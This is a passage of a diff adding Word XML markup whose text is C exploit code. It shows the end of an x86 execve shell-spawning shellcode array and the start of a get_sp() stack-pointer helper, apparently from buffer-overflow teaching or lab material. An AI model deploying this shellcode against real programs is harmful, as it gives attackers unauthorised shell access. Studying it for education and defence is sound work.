+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>ebx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">              */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    "\x50"                 /* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>pushl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>eax</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                   */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    "\x53"                 /* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>pushl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>ebx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                   */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    "\x89\xe1"             /* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>movl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    %</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>esp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>ecx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">              */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    "\x99"                 /* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>cdql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                           */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    "\xb0\x0b"             /* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>movb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    $0x0b</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>,%</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>al              */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    "\</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>xcd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">\x80"             /* </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">     $0x80                  */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/* Function that calls an assembly </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>instuction</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> return the address of the top of the stack  */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>unsigned</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> long </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>get_sp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>(void)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
